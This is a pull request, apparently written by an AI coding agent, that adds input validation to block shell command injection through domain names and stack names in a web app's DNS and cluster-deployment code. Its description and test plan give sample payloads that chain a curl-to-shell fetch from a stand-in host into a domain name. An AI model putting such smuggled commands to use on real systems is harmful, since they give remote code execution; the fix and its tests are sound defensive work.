### PR TITLE
fix(injection): validate domain names and stack names before shell command construction

### DIFF
--- a/apps/web/src/app/api/ingress/domains/[id]/dns/bootstrap/route.ts
+++ b/apps/web/src/app/api/ingress/domains/[id]/dns/bootstrap/route.ts
@@ -173,6 +173,10 @@ export async function POST(
     include: { coreDnsEnvironment: true, dnsRecords: { where: { enabled: true } } },
   })
   if (!domain) return new Response(JSON.stringify({ error: 'Domain not found' }), { status: 404 })
+  const DOMAIN_NAME_RE = /^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$/
+  if (!DOMAIN_NAME_RE.test(domain.name)) {
+    return new Response(JSON.stringify({ error: 'Invalid domain name in record' }), { status: 400 })
+  }
   if (!domain.coreDnsEnvironment) return new Response(JSON.stringify({ error: 'No CoreDNS environment selected' }), { status: 422 })
 
   const env = domain.coreDnsEnvironment

--- a/apps/web/src/app/api/ingress/domains/[id]/route.ts
+++ b/apps/web/src/app/api/ingress/domains/[id]/route.ts
@@ -5,10 +5,18 @@ import { prisma } from '@/lib/db'
 export async function PATCH(req: NextRequest, { params }: { params: { id: string } }) {
   try { await requireAdmin() } catch { return new Response(JSON.stringify({error:'Unauthorized'}),{status:401,headers:{'Content-Type':'application/json'}}) }
   const body = await req.json()
+  const DOMAIN_NAME_RE = /^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$/
+  if (body.name !== undefined) {
+    const name = (body.name ?? '').trim().toLowerCase()
+    if (!name || !DOMAIN_NAME_RE.test(name)) {
+      return NextResponse.json({ error: 'Invalid domain name' }, { status: 400 })
+    }
+    body.name = name
+  }
   const domain = await prisma.domain.update({
     where: { id: params.id },
     data: {
-      ...(body.name                 !== undefined && { name:                 body.name.trim().toLowerCase() }),
+      ...(body.name                 !== undefined && { name:                 body.name }),
       ...(body.type                 !== undefined && { type:                 body.type }),
       ...(body.notes                !== undefined && { notes:                body.notes }),
       ...(body.coreDnsEnvironmentId !== undefined && { coreDnsEnvironmentId: body.coreDnsEnvironmentId || null }),

--- a/apps/web/src/app/api/ingress/domains/route.ts
+++ b/apps/web/src/app/api/ingress/domains/route.ts
@@ -39,9 +39,14 @@ export async function GET() {
 export async function POST(req: NextRequest) {
   try { await requireAdmin() } catch { return new Response(JSON.stringify({error:'Unauthorized'}),{status:401,headers:{'Content-Type':'application/json'}}) }
   const body = await req.json()
+  const DOMAIN_NAME_RE = /^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$/
+  const name = (body.name ?? '').trim().toLowerCase()
+  if (!name || !DOMAIN_NAME_RE.test(name)) {
+    return NextResponse.json({ error: 'Invalid domain name' }, { status: 400 })
+  }
   const domain = await prisma.domain.create({
     data: {
-      name:  body.name.trim().toLowerCase(),
+      name,
       type:  body.type  ?? 'public',
       notes: body.notes ?? null,
     },

--- a/apps/web/src/lib/cluster-bootstrap.ts
+++ b/apps/web/src/lib/cluster-bootstrap.ts
@@ -342,6 +342,15 @@ async function deploySwarmStack(
   stackName: string,
   emit: (event: BootstrapEvent) => void,
 ): Promise<void> {
+  if (!/^[a-zA-Z0-9_-]+$/.test(stackName)) {
+    throw new Error(`Invalid stack name: ${stackName}`)
+  }
+  if (!/^[a-zA-Z0-9._-]+$/.test(connection.host)) {
+    throw new Error(`Invalid host: ${connection.host}`)
+  }
+  if (!/^[a-zA-Z0-9._-]+$/.test(connection.user)) {
+    throw new Error(`Invalid user: ${connection.user}`)
+  }
   // Clone the repo locally (needed for docker stack deploy which reads compose files)
   const stackDir = join(tmpdir(), `orion-swarm-${randomBytes(4).toString('hex')}`)
   await mkdir(stackDir, { recursive: true })

--- a/apps/web/src/lib/dns-sync.ts
+++ b/apps/web/src/lib/dns-sync.ts
@@ -80,6 +80,7 @@ export async function syncToDocker(
   domainName: string,
   zoneContent: string,
 ): Promise<void> {
+  validateDomainName(domainName)
   // Write zone file into the running coredns container
   const escaped = zoneContent.replace(/'/g, `'"'"'`)
   await gatewayExec('docker_exec', {


### PR DESCRIPTION
## Summary

CRITICAL: `Domain.name` was stored with only `.trim().toLowerCase()` (no regex validation), then interpolated directly into `sh -c` docker_exec command strings executed on the remote gateway host. A name like `x;curl http://evil/x|sh;` yields RCE on the gateway host.

- **ingress/domains/route.ts** (POST): Validate `body.name` against `DOMAIN_NAME_RE` before `prisma.domain.create`; return 400 on invalid input
- **ingress/domains/[id]/route.ts** (PATCH): Same validation when `body.name` is present
- **lib/dns-sync.ts** `syncToDocker`: Add `validateDomainName(domainName)` call at top before the domain name is interpolated into the `sh -c` command string (defense-in-depth; `syncDomainDns` already called it)
- **ingress/domains/[id]/dns/bootstrap/route.ts**: Add `DOMAIN_NAME_RE` guard immediately after loading the domain record, before `buildDockerCorefile`, `syncToDocker`, and `buildCoreDnsManifests`
- **lib/cluster-bootstrap.ts** `deploySwarmStack`: Validate `stackName` against `^[a-zA-Z0-9_-]+$` before interpolation into the SSH remote command string; validate `connection.host` and `connection.user` against safe character sets

## Test plan
- [ ] POST /api/ingress/domains with `name: "evil;curl http://x/|sh"` returns 400
- [ ] POST /api/ingress/domains with `name: "valid.example.com"` succeeds
- [ ] PATCH /api/ingress/domains/[id] with invalid name returns 400
- [ ] DNS bootstrap for a domain with an invalid name returns 400 (not RCE)
- [ ] Stack deployment with invalid stack name throws before SSH command is built

https://claude.ai/code/session_01UPxi6zY3g16PMA2W4k7wzV

---
_Generated by [Claude Code](https://claude.ai/code/session_01UPxi6zY3g16PMA2W4k7wzV)_